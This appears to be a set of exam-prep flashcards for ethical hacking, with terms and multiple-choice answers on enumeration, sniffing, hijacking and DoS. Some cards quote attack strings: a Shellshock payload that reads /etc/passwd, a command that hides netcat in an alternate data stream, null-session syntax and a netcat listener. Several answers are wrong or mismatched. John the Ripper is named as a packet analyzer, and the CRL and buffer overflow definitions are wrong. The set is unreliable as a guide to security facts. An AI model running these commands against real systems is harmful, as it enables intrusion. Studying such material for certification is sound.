Domain is Truck
The true administrator is Joe.
You are working with a pen test team that is performing enumeration. You have just seen a team member enter the following command. What does it demonstrate?
C:\>user2sid \\truck guest
S-1-5-21-343818398-789336058-1343024091-501
C:\>sid2user 5 21 343818398 789336058 1343024091 500
Name is Joe
Domain is Truck
The true administrator is Joe.
Eavesdropping
The unauthorized capture and reading of network traffic.
Computer-aided software engineering (CASE)
The use of software tools to assist in the development and maintenance of software. Tools used in this way are known as CASE tools.
End-user computing
The use or development of information systems by the principal users of the systems' outputs or by their staffs.
Vandalism
The willful destruction of property.
Collision
These occur when a hashing algorithm such as MD5 creates the same value for two or more different files.
You found the following command on a compromised system: Type nc.exe > readme.txt:nc.exe What is its purpose?
This command is used to stream Netcat behind readme.txt.
Inference attack
This form of attack relies on the attacker's ability to make logical connections between seemingly unrelated pieces of information.
Blackbox testing
This form of testing occurs when the tester has no knowledge of the target or its network structure.
False rejection rate (FRR)
This is a biometric device error that is considered a type I error. It is a biometric system measurement that indicates the percentage of authorized individuals who are incorrectly denied access.
False acceptance rate (FAR)
This is a type II biometric device error. It is a biometric system measurement that indicates the percentage of individuals who are incorrectly granted access. This is the worst type of error that can occur because it means that unauthorized individuals have been allowed access.
End user licensing agreement (EULA)
This is the software license that software vendors create to protect and limit their liability as well as hold the purchaser liable for illegal pirating of the software application. The EULA typically has language in it that protects the software manufacturer from software bugs and flaws and limits the liability of the vendor.
Scope creep
This is the uncontrolled change in the project's scope. It causes the assessment to drift away from its original scope and results in budget and schedule overruns.
Natural threats
Threat posed by nature; for example, fire, floods, and storms.
Man-made threats
Threats caused by humans such as hacker attacks, terrorism, or destruction of property.
Editing
To review for possible errors and make final changes, if necessary, to information in a database.
Why would an attacker scan for port 445?
To scan for SMB services and verify that the system is Windows 2000 or greater
Downloading
Transferring information from one computer to another computer and storing it there.
Which of the following approaches to vulnerability assessment relies on the administrator providing baseline of system configuration and then scanning continuously without incorporating any information found at the time of scanning?
Tree-based Assessment
What is the best defense against SNMP enumeration?
Turn off SNMP.
Deadman door
Two sets of doors: It allows one person to enter the first door, then, after it is closed, the second door is allowed to open. Deadman doors are used to control access and are also known as a mantrap.
Completely connected (mesh) configuration
Type of network configuration designed so that all devices are connected to all others with many redundant interconnections between network devices.
You have just gotten an alert from your IDS. It has flagged the following string: env x='(){:;};echo exploit' bash -c 'cat /etc/passwd'. What is the attacker attempting to do?
Use the Shellshock vulnerability to display the passwd file.
Modulation
Used by modems to convert a digital computer signal into an analog telecommunications signal.
Certificate Authority (CA)
Used in the PKI infrastructure to issue certificates and report status information and certificate revocation lists.
Electronic serial number (ESN)
Used to identify a specific cell phone when it is turned on and makes a request to join a cell network.
code review and testing
Used to identify bad programming patterns, security misconfigurations, functional bugs, and logic flaws.
Address Resolution Protocol
Used to map a known Internet Protocol (IP) address to an unknown physical address on the local network; can take the known IP address that is being passed down the stack and use it to resolve the unknown MAC address by means of a broadcast message.
Integrity
Used to verify the accuracy and completeness of an item
Committed information rate (CIR)
Used when describing the data rate guaranteed by a Frame Relay data communications circuit.
Personal area network (PAN)
Used when discussing Bluetooth devices; refers to the connection that can be made with Bluetooth between these various devices.
test coverage analysis
Uses test cases that are written against the application requirements specifications.
Data owner
Usually a member of senior management of an organization who is ultimately responsible for ensuring the protection and use of the organization's data.
Digital certificate
Usually issued by trusted third parties that contains the name of a user or server, a digital signature, a public key, and other elements used in authentication and encryption. X.509 is the most common type.
What is Vulnerability Assessment?
Vulnerability assessment is an examination of the ability of a system or application, including current security procedures and controls, to withstand assault.
Wired equivalent privacy (WEP)
WEP is based on the RC4 encryption scheme. It was designed to provide the same level of security as that of a wired LAN. Because of 40-bit encryption and problems with the initialization vector, it was found to be insecure.
Which of the following is a well-known sniffing program?
Wireshark
Tools used to combine a piece of malware with a legitimate program are known as what?
Wrappers
During a pen test, you have successfully gained access to a system. You are able to gain local administrator status on one workstation and have now moved to local administrator on a second workstation. With this in mind, which of the following is true?
You have completed horizontal privilege escalation.
How does hijacking differ from sniffing?
You take over an existing session.
Sniffing on a hub is considered which of the following?
a passive attack
Which of the following matches the common padding found on the end of short Windows LanMan (LM) passwords? a. 1404EE b. EE4403 c. EEEEEE d. 1902DD
a. 1404EE
You have been asked to analyze the SOA record from a targeted company and identify how long any DNS poisoning would last. The values from the SOA record are 2003080: 172800: 900: 1209600: 3600. Which of the following describes how long DNS poisoning would last? a. 3600 b. 900 c. 1209600 d. 2003080
a. 3600
During a security assessment you are asked to help with a footprinting activity. Which of the following might be used to determine network range? a. ARIN b. DIG c. Traceroute d. Ping host
a. ARIN
Which type of testing occurs when you have no knowledge of the network? a. Black box b. Gray box c. White box d. Blind testing
a. Black box
What are the three main tenets of security? a. Confidentiality, integrity, and availability b. Authorization, authentication, and accountability c. Deter, delay, and detect d. Acquire, authenticate, and analyze
a. Confidentiality, integrity, and availability
Phishing, social engineering, and buffer overflows are all typically used at what point in the attacker's process? a. Gaining access b. Backdoors c. Covering tracks d. Port scanning
a. Gaining access
Which of the following is a tool commonly used for enumeration? a. Hyena b. John c. LCP d. IAM tool kit
a. Hyena
What scan is also known as a zombie scan? a. IDLE scan b. SYN scan c. FIN scan d. Stealth scan
a. IDLE scan
During a penetration test, you have been asked to use a tool that will allow you to capture network traffic and look for clear-text usernames and passwords. Which of the following is an example of a command-line packet analyzer similar to Wireshark? a. John the Ripper b. BetterCAP c. TShark d. Snort
a. John the Ripper
An ICMP type 8 is which of the following? a. Ping message b. Unreachable message c. TTL failure message d. Redirect message
a. Ping message
Which type of hacker is considered a good guy? a. White hat b. Gray hat c. Black hat d. Suicide hacker
a. White hat
Buffer overflow
an amount of memory reserved for the temporary storage of data
Certificate Revocation List (CRL)
approval, authorization, and policymaking bodies to assess a project proposal and reach a reasoned decision, as well as justify the commitment of resources to a project.
During enumeration, what port may specifically indicate a portmapper on a Linux computer? a. 110 b. 111 c. 389 d. 445
b. 111
During enumeration, what port may specifically indicate portmapper on a Linux computer? a. 110 b. 111 c. 389 d. 445
b. 111
Which of the following would be considered outside the scope of footprinting and information gathering? a. Finding physical addresses b. Attacking targets c. Identifying potential targets d. Reviewing company website
b. Attacking targets
Which of the following is a form of session hijacking that requires no knowledge of session IDs or any other information before the attack? a. Union based b. Blind c. Session layer d. Passive
b. Blind
CNAMEs are associated with which of the following? a. ARP b. DNS c. DHCP d. Google hacking
b. DNS
Which of the following is considered a nontechnical attack? a. Password sniffing b. Dumpster diving c. Password injection d. Software keylogger
b. Dumpster diving
How is ethical hacking different from hacking? a. Ethical hackers never launch exploits. b. Ethical hackers have signed written permission. c. Ethical hackers act with malice. d. Ethical hackers have verbal permission.
b. Ethical hackers have signed written permission.
You have been asked to gather some specific information during a penetration test. The "intitle" string is used for what activity? a. Traceroute b. Google search c. Website query d. Host scanning
b. Google search
Which type of hacker performs both ethical and unethical activities? a. White hat b. Gray hat c. Black hat d. Suicide hacker
b. Gray hat
A TCP SYN flood attack uses the three-way handshake mechanism. The attacker at system A sends a spoofed SYN packet to the victim at system B. System B responds by sending a SYN/ACK packet to the spoofed system. System A does not reply to system B, leaving victim B hung waiting for a response. Which of the following best describes the status of victim B? a. Fully open b. Half open c. Session fully established d. Half closed
b. Half open
Which of the following is not a Trojan mitigation step? a. User education b. Manual updates c. Isolate infected systems d. Establish user practices built on policy
b. Manual updates
Which of the following are denial of service attacks typically not used for? a. Availability attacks b. Pump and dump c. Hacktivism d. Extortion via a threat of a DoS attack
b. Pump and dump
Which type of password cracking makes use of the space/time memory trade-off? a. Dictionary attack b. Rainbow table c. Rule d. Hybrid
b. Rainbow table
Which of the following laws pertains to accountability for public companies relating to financial information? a. FISMA b. SOX c. 18 U.S.C. 1029 d. 18 U.S.C. 1030
b. SOX
What is the purpose of the command nc -l -v -n -p 80? a. Redirect port 80 traffic b. Set up a covert channel listening on port 80 c. Act as a keylogger on port 80 d. Block port 80
b. Set up a covert channel listening on port 80
Tools used to combine a piece of malware with a legitimate program are known as what? a. Fuzzers b. Wrappers c. Compilers d. Binders
b. Wrappers
In CVSS, the ______ group represents the intrinsic characteristics of a vulnerability that are constant over time and do not depend on a user-specific environment. This metric group is the most important information in the scoring system and the only one that's mandatory to obtain a vulnerability score.
base
When would an attacker want to begin a session hijacking attack if session fixation is being used?
before authentication
Which of the following is a form of session hijacking that requires no knowledge of session IDs or any other information before the attack?
blind
Sniffing on a hub is considered which of the following? a. Port mirroring b. Spanning c. A passive attack d. An active attack
c. A passive attack
Which type of hacker is considered unethical? a. White hat b. Gray hat c. Black hat d. Brown hat
c. Black hat
Where should an ethical hacker start the information-gathering process? a. Interview with company b. Dumpster diving c. Company's website d. Interview employees
c. Company's website
How would you use ARP cache poisoning to determine malicious activity on a network? a. You cannot because it would result in a broadcast storm. b. It would allow you to flood the network with fake MAC addresses. c. If you cannot SPAN a port, you can use ARP cache poisoning to see all traffic going to all other ports on the switch. d. It bypasses DHCP snooping.
c. If you cannot SPAN a port, you can use ARP cache poisoning to see all traffic going to all other ports on the switch.
LoriotPro is used for which of the following? a. Active OS fingerprinting b. Passive OS fingerprinting c. Mapping d. Traceroute
c. Mapping
Which of the following addresses network security testing? a. NIST 800-33 b. NIST 800-42 c. NIST 800-115 d. NIST 800-30
c. NIST 800-115
If you approach a running system that you suspect may be infected, what might you do to quickly assess what is running on the system by using built-in applications? a. CurrPorts b. Fport c. Netstat -an d. TList
c. Netstat -an
What is the common Windows and Linux tool that is used for port scanning? a. Hping b. Amap c. Nmap d. SuperScan
c. Nmap
If you were going to enumerate DNS, which of the following tools could you use? a. Route print b. ARP -A c. Nslookup d. IPconfig
c. Nslookup
The four steps of the IPv6 DHCP process can be abbreviated as which of the following? a. SORA b. DOSA c. SARR d. DORA
c. SARR - DHCPv6 uses four different steps: solicit, advertise, request, and reply.
Microsoft uses various techniques to protect user account information. The second layer of security on the SAM file is known as what? a. Encoding b. Obscuring c. SYSKEY d. Salting
c. SYSKEY
What does the Nmap -sT switch do? a. UDP scan b. ICMP scan c. TCP full connect scan d. TCP ACK scan
c. TCP full connect scan
Which type of testing occurs when individuals know the entire layout of the network? a. Black box b. Gray box c. White box d. Blind testing
c. White box
How does hijacking differ from sniffing? a. You only listen in on an existing session. b. You only intercept clear-text data. c. You take over an existing session. d. You cannot initiate a new connection.
c. You take over an existing session.
You have been asked to examine a Windows 7 computer that is running poorly. You first used Netstat to examine active connections, and you now would like to examine performance via the Computer Management Console. Which of the following is the correct command to launch it?
c:\compmgmt.msc
Which of the following is not a banking malware propagation technique?
code injection
IPv6 addresses are how long? a. 2 bytes b. 4 bytes c. 64 bytes d. 128 bits
d. 128 bits
During enumeration, what port may specifically indicate a Windows computer and most likely not a Linux computer? a. 110 b. 111 c. 25 d. 445
d. 445
During enumeration, what port may specifically indicate a Windows computer? a. 110 b. 111 c. 25 d. 445
d. 445
Which form of testing occurs when insiders are not informed of the pending test? a. Black box b. Gray box c. White box d. Blind testing
d. Blind testing
Which format stores Windows passwords in a 14-character field? a. NTLMv2 b. Kerberos c. Salted d. LAN Manager
d. LAN Manager
What are the two types of reconnaissance? a. Active and proactive b. Internal and external c. Inside and outside d. Passive and active
d. Passive and active
During a footprinting exercise, you have been asked to gather information from APNIC and LACNIC. What are these examples of? a. IPv6 options b. DHCP servers c. DNS servers d. RIRs
d. RIRs
The OSSTMM is used for which of the following? a. Open social engineering testing b. Security training c. Audits d. Security assessments
d. Security assessments
Which type of hacker will carry out an attack even if the result could be a very long prison term? a. White hat b. Gray hat c. Black hat d. Suicide hacker
d. Suicide hacker
A RID of 500 is associated with what account? a. A user account b. The first user's account c. The guest account d. The administrator account
d. The administrator account
When reviewing a Windows domain, you are able to extract some account information. A RID of 500 is associated with what account? a. A user account b. The first user's account c. The guest account d. The administrator account
d. The administrator account
Modem
device used to connect a computer to an analog phone line. Modems use the process of modulation.
Which of the following can be used to exhaust DHCP addresses?
gobbler
Which of the following is not a Trojan mitigation step?
manual updates
You are trying to establish a null session to a target system. Which is the correct syntax?
net use \\IP_address\IPC$ "" /u:""
If you approach a running system that you suspect may be infected, what might you do to quickly assess what is running on the system by using built-in applications?
netstat -an
Which of the following is an example of a command to detect a NIC in promiscuous mode?
nmap --script=sniffer-detect [target IP Address/Range of IP addresses]
_______ are similar to programs such as WinZip, Rar, and Tar in that they compress the file yet are used to hide the true function of malware.
packers
One of the members of your red team would like to run Dsniff on a span of the network that is composed of hubs. Which of the following types best describes this attack?
passive sniffing
Which DoS attack technique makes use of the Direct Connect protocol?
peer-to-peer attack
Which of the following is not a client-side session hijacking technique?
session fixation
Cookie Cadger is an example of which of the following?
session hijacking tool
Which of the following techniques requires an attacker to listen to the conversation between the victim and server and capture the authentication token for later reuse?
session replay
Bypassed authentication attack
simulates identifying wireless access points and modems
Which of the following is a MAC address spoofing tool?
smac
You have been able to intercept many ICMP packets with Wireshark that are addressed to the broadcast address on your network and are shown to be from the web server. The web server is not sending this traffic, so it is being spoofed. What type of attack is the network experiencing?
smurf
Which of the following is the least vulnerable to a sniffing attack?
ssh
You would like to attempt a man-in-the-middle attack to take control of an existing session. What transport layer protocol would allow you to predict a sequence number?
tcp
During a pen test, you have access to two machines and want to capture session IDs sent from the server. The first machine has Wireshark installed and is the client. Its IP address is 192.168.123.99. The second machine is the web server and is issuing session IDs. Its IP address is 192.168.123.150. Which of the following Wireshark filters best meets your needs and gives you just the packets with session IDs issued by the web server?
tcp.srcport == 80 && ip.src == 192.168.123.150
You have been reading about several techniques to help determine whether the traffic is coming from a legitimate source that can help you track back an ongoing DDoS attack. Which of the following Wireshark display filters can help flag packets that indicate the receiver's window size is exhausted and that no buffer is available?
tcp.window_size == 0 && tcp.flags.reset != 1
Vulnerability research is ____________.
the process of discovering vulnerabilities and design flaws
Which DDoS tool uses TCP port 6667?
trinity
Which of the following is an example of a command-line packet analyzer similar to Wireshark?
tshark
CNAMES
Used in the Domain Name Service (DNS); the record contains the alias or nickname.
You have discovered that several of your team members' computers were infected. The attack was successful because the attacker guessed or observed which websites the victims visited and infected one or more of those sites with malware. Which type of attack was executed?
watering hole attack